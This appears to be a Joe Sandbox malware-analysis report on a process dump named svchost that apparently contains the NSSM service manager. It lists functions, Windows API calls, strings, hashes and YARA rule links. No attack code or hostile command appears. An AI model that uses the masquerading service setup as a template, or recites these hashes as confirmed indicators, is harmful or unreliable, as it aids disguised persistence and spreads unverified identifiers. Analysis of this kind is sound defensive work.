Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
String ID: QUERY_SERVICE_CONFIG$query_service_config()
API String ID: 2921672788-976127789
Opcode ID: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
Instruction ID: ec6184287c6e1aa3659987899a8ea3cdc59ea47e861b503f6ba41a7943c46725
Opcode Fuzzy Hash: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
Instruction Fuzzy Hash: 3F21D5F2A452017BE600A7A5EC8AFBF775CEFC5329F10893AF605D3181DA78D8049679

Function 00404FB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00404FBB
GetLastError.KERNEL32(00000000), ref: 00404FC8

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404FFB
HeapAlloc.KERNEL32(00000000), ref: 00404FFE

Strings

expand_environment_string, xrefs: 0040500B
ExpandEnvironmentStrings(), xrefs: 00405010

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$AllocHeapSource$DeregisterEnvironmentErrorExpandLastLocalProcessRegisterReportStringsValue
String ID: ExpandEnvironmentStrings()$expand_environment_string
API String ID: 834161584-2090451141
Opcode ID: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
Instruction ID: 1c240b0065301ebdc15cfa0ece81b4dfea20bbf87cc1a9778ddf823e08b6aba0
Opcode Fuzzy Hash: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
Instruction Fuzzy Hash: AF11B2F2A416017BE21026B5BC4AFEB771CDB8076AF114472FA05E2182EA79C54045B9

Function 0040E600 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000016), ref: 0040E620
HeapAlloc.KERNEL32(00000000), ref: 0040E623
__snwprintf_s.LIBCMT ref: 0040E658
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E682
HeapFree.KERNEL32(00000000), ref: 0040E685

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E6C4
HeapFree.KERNEL32(00000000), ref: 0040E6C7

Strings

0x%08x, xrefs: 0040E64E
log_service_control(), xrefs: 0040E630, 0040E666
control code, xrefs: 0040E635, 0040E66B

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$EventProcess$FreeSource$AllocDeregisterRegisterReport__snwprintf_s
String ID: 0x%08x$control code$log_service_control()
API String ID: 844069407-2089045330
Opcode ID: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
Instruction ID: 612ea0ede9ba1e7cb3a868644965a314014b177a7dd95aa26f1d9d3cb81d428a
Opcode Fuzzy Hash: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
Instruction Fuzzy Hash: 6211CBF2B4031037E62062676C46FDF2648CB90BAAF550976FA09B61C2D5BD8C5141BD

Function 004084D0 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 227COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 00408511

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

CreationDisposition, xrefs: 004085FE, 00408625
ShareMode, xrefs: 00408588, 004085AF
FlagsAndAttributes, xrefs: 00408677, 0040869E
get_createfile_parameters(), xrefs: 0040851F, 004085AA, 00408620, 00408699
%s%s, xrefs: 0040858E, 00408604, 0040867D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$CreationDisposition$FlagsAndAttributes$ShareMode$get_createfile_parameters()
API String ID: 2445375048-825329064
Opcode ID: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
Instruction ID: d5bcaed63e337bfabc806c2c34b187c565ea729d6d27f924a01f1bb630a1831b
Opcode Fuzzy Hash: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
Instruction Fuzzy Hash: D0511AB27443001BD200A61A9D43FEFB3D4AB98779FD4052FF649E62C1FA7DD580869A

Function 0040C610 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

%c%u, xrefs: 0040C779

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: %c%u
API String ID: 0-883269693
Opcode ID: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
Instruction ID: fcb05bf5aa25034c6b283f3d3c8d8d5dbfc9814c65828dd12b5a4fa76bd1d4d2
Opcode Fuzzy Hash: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
Instruction Fuzzy Hash: 5A51BE729443058BD324DF68E8C57ABB3E5FB84310F544A3EE854D33A0E77A98458A9A

Function 004052C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65windowmemoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
TlsSetValue.KERNEL32(00000014,00000000,?,00401042,00000000,00000000), ref: 004052F5
GetUserDefaultLangID.KERNEL32(00000000,0000FFFF,00000000,?,?,?,00401042,00000000,00000000), ref: 00405305
FormatMessageW.KERNEL32(00001200,00000000,?,?,?,?,?,00401042,00000000,00000000), ref: 00405321
FormatMessageW.KERNEL32(00001200,00000000,?,00000000,00000000,0000FFFF,00000000,?,?,?,?,00401042,00000000,00000000), ref: 00405336
__snwprintf_s.LIBCMT ref: 0040534A

Strings

<out of memory for error message>, xrefs: 004052E6
system error %lu, xrefs: 0040533D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: FormatMessageValue$AllocDefaultLangLocalUser__snwprintf_s
String ID: <out of memory for error message>$system error %lu
API String ID: 1317610408-3923297632
Opcode ID: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
Instruction ID: f23edb150031ebe2e0488c34495c660aa377f69acf961f8f06e15d9152bb88fb
Opcode Fuzzy Hash: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
Instruction Fuzzy Hash: 630180B2B4472377E23066657C05EBB2B58DF86BA5F144276FE20E62D0D978CC0195AC

Function 0040FC10 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 226sleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,768704E0,?,00000000), ref: 0040FC4F
GetExitCodeProcess.KERNEL32(?,?), ref: 0040FC6B
CloseHandle.KERNEL32(?), ref: 0040FC92
__snwprintf_s.LIBCMT ref: 0040FCB9
__wcsnicmp.LIBCMT ref: 0040FD5A
Sleep.KERNEL32(00007530), ref: 0040FDD8
Sleep.KERNEL32(000000FF), ref: 0040FE22

Part of subcall function 00409FC0: GetProcessTimes.KERNEL32(?,?,?,?,?), ref: 00409FDC
Part of subcall function 00409FC0: GetLastError.KERNEL32(00000000), ref: 00409FE7

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Part of subcall function 0040E6E0: UnregisterWait.KERNEL32(?), ref: 0040E6FB
Part of subcall function 0040E6E0: SetServiceStatus.ADVAPI32(?,?), ref: 0040E785
Part of subcall function 0040E6E0: SetServiceStatus.ADVAPI32(?,?,?,00000001), ref: 0040E823

Strings

%lu, xrefs: 0040FCAB

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$ProcessServiceSleepSourceStatusTime$CloseCodeDeregisterErrorExitFileHandleLastRegisterReportSystemTimesUnregisterWait__snwprintf_s__wcsnicmp
String ID: %lu
API String ID: 613531104-685833217
Opcode ID: 9574b5d5100c4da6b46ff8a507994b92466411802de88de43b15cd9b3701a9b8
Instruction ID: b1cca182276ff02709501da2bb93ad667c3ccdeb18173aa65ccdb91ba50f2597
Opcode Fuzzy Hash: 9574b5d5100c4da6b46ff8a507994b92466411802de88de43b15cd9b3701a9b8
Instruction Fuzzy Hash: 1971FDB1504304AFE320DB55DC46FEB77A8EB84308F44493EF75A522C1E779A948C7A9

Function 0040A040 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040A083
__snwprintf_s.LIBCMT ref: 0040A0A1
GetLastError.KERNEL32(00000000), ref: 0040A0AA

Strings

%lu, xrefs: 0040A093

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ErrorLastOpenProcess__snwprintf_s
String ID: %lu
API String ID: 1619034979-685833217
Opcode ID: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
Instruction ID: 8f5ceacfd598cb2394abf54756f4a9d9aecdfdb9d28b481e073514ca66ad884b
Opcode Fuzzy Hash: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
Instruction Fuzzy Hash: 6C31ADB66002006BD2049765DC82EEFB3A4EF8C324F84452FF509D7291F678E69587DA

Function 0040A330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

kill_console, xrefs: 0040A437

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: kill_console
API String ID: 0-1600766264
Opcode ID: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
Instruction ID: 6b8feeb58a831c22132309c7bed50a8a77aa2e1ca0f50238c9c6c98eb8e5a449
Opcode Fuzzy Hash: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
Instruction Fuzzy Hash: 202106F6A0030067F6206665BC4AFEB325CCB8035CF45843AFA09E72C2F97DDC9145AA

Function 00410F20 Relevance: 13.6, APIs: 9, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
Instruction ID: 426f323d08f1782c1e6f60194951a9d10300faf2c5e3bd40731d4607ec8a1430
Opcode Fuzzy Hash: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
Instruction Fuzzy Hash: 0041B772A042015FC720DB55DC45BEBB3E8EBC8754F04492AF95483240E7B8E9C5C7A6

Function 00405370 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54memorywindowCOMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
__snwprintf_s.LIBCMT ref: 004053DC

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Strings

system error %lu, xrefs: 004053CB

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: FormatHeapMessage$AllocDefaultLangProcessUser__snwprintf_s__vsnwprintf_s_l
String ID: system error %lu
API String ID: 3208699588-1824642319
Opcode ID: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
Instruction ID: accda3c8b7d2623306d44ba6687032fe0a4120849f219a87f72b30063895a064
Opcode Fuzzy Hash: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
Instruction Fuzzy Hash: 5A01A7F16043127BE610A7659C09FBB7B9CDF807A1F10453AFA10D61C0E7B4D4059A78

Function 004122D0 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004122FA
HeapFree.KERNEL32(00000000), ref: 00412301

Strings

SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS, xrefs: 00412398, 0041239D
SERVICE_INTERACTIVE_PROCESS, xrefs: 004123AD, 004123B2
SERVICE_WIN32_SHARE_PROCESS, xrefs: 00412362, 00412367
SERVICE_KERNEL_DRIVER, xrefs: 0041234D, 00412352
SERVICE_WIN32_OWN_PROCESS, xrefs: 00412323, 00412328
SERVICE_FILE_SYSTEM_DRIVER, xrefs: 00412338, 0041233D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
API String ID: 3859560861-2402770260
Opcode ID: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
Instruction ID: 3fa550764ded5b60e080b7974a66712a4ad7996e9d168e8143a02efed0acfda5
Opcode Fuzzy Hash: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
Instruction Fuzzy Hash: BC21AFFE6003051BD600DB79AEC99AB335CEB85309F18896AFC14C2341E37DECD49269

Function 00408250 Relevance: 12.1, APIs: 8, Instructions: 73memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 00408267
GetLastError.KERNEL32 ref: 0040827B
__cftoe.LIBCMT ref: 0040828F

Part of subcall function 00413380: __mbstowcs_s_l.LIBCMT ref: 00413396

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082A7
HeapAlloc.KERNEL32(00000000), ref: 004082AA
__cftoe.LIBCMT ref: 004082C7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082F9
HeapFree.KERNEL32(00000000), ref: 004082FC

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process__cftoe$AddressAllocErrorFreeLastProc__mbstowcs_s_l
String ID:
API String ID: 323180873-0
Opcode ID: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
Instruction ID: 2e5e402e2c2626b49358907e613a0df75488633df38e2a23a78af6a6010d2103
Opcode Fuzzy Hash: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
Instruction Fuzzy Hash: C911D2B1505310BBC3109B55DC49F9BB7ACEF89718F10466DF915A7282DA34D800CB7A

Function 00405790 Relevance: 12.0, APIs: 8, Instructions: 42COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,0000040D), ref: 004057AF
EnableWindow.USER32(00000000), ref: 004057B8
GetDlgItem.USER32(00000000,0000040F), ref: 004057CA
EnableWindow.USER32(00000000), ref: 004057CD
GetDlgItem.USER32(00000000,00000410), ref: 004057DB
EnableWindow.USER32(00000000), ref: 004057DE
GetDlgItem.USER32(00000000,00000411), ref: 004057ED
EnableWindow.USER32(00000000), ref: 004057F0

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: EnableItemWindow
String ID:
API String ID: 3833022359-0
Opcode ID: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
Instruction ID: e2f7c1c09c8d93b2009dc5b4c4f002420ea12ae4a46ab4e20d95bb4881afef45
Opcode Fuzzy Hash: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
Instruction Fuzzy Hash: 37F0AEF1F4031C36D610E7B57C84D676B6CEBC4591B058436B700D3190CDF8EA058A74

Function 00411F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_fwprintf.LIBCMT ref: 00411F91

Strings

%s, xrefs: 00411F83

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: _fwprintf
String ID: %s
API String ID: 394020290-620797490
Opcode ID: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
Instruction ID: 75f6ff0ad44b13ca8f97eaa8f5d04c03990c627219346353a10bb8e85013ff75
Opcode Fuzzy Hash: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
Instruction Fuzzy Hash: EC4135B1A0020067E6105B79AD49BAB73489B44329F14023AF715E72E2E778CC92D6AD

Function 0040B460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 004084D0: __snwprintf_s.LIBCMT ref: 00408511

_memset.LIBCMT ref: 0040B4CF
_memset.LIBCMT ref: 0040B544

Strings

AppStderr, xrefs: 0040B57C
AppStdin, xrefs: 0040B492
AppStdout, xrefs: 0040B507

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: _memset$__snwprintf_s
String ID: AppStderr$AppStdin$AppStdout
API String ID: 2562117923-491939989
Opcode ID: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
Instruction ID: 1b06f4d84a2b42bb779b35d5d98be90b00d199c4a4a766b1a98f55c8d30fc170
Opcode Fuzzy Hash: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
Instruction Fuzzy Hash: B24180F2644305BBE320DE55EC42F97B3ECEF84755F10042EF2598A2C1EBB5A5488BA5

Function 004102C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000), ref: 004102F8
HeapAlloc.KERNEL32(00000000), ref: 004102FB
__snwprintf_s.LIBCMT ref: 0041031D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041032E
HeapFree.KERNEL32(00000000), ref: 00410331

Strings

value_from_string(), xrefs: 0041030B, 0041033B

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree__snwprintf_s
String ID: value_from_string()
API String ID: 2465375985-962593079
Opcode ID: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
Instruction ID: bb1032cf64baaab7dc3efed814e35f34ffcfd1963eead0c03da6be78f6f1ad05
Opcode Fuzzy Hash: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
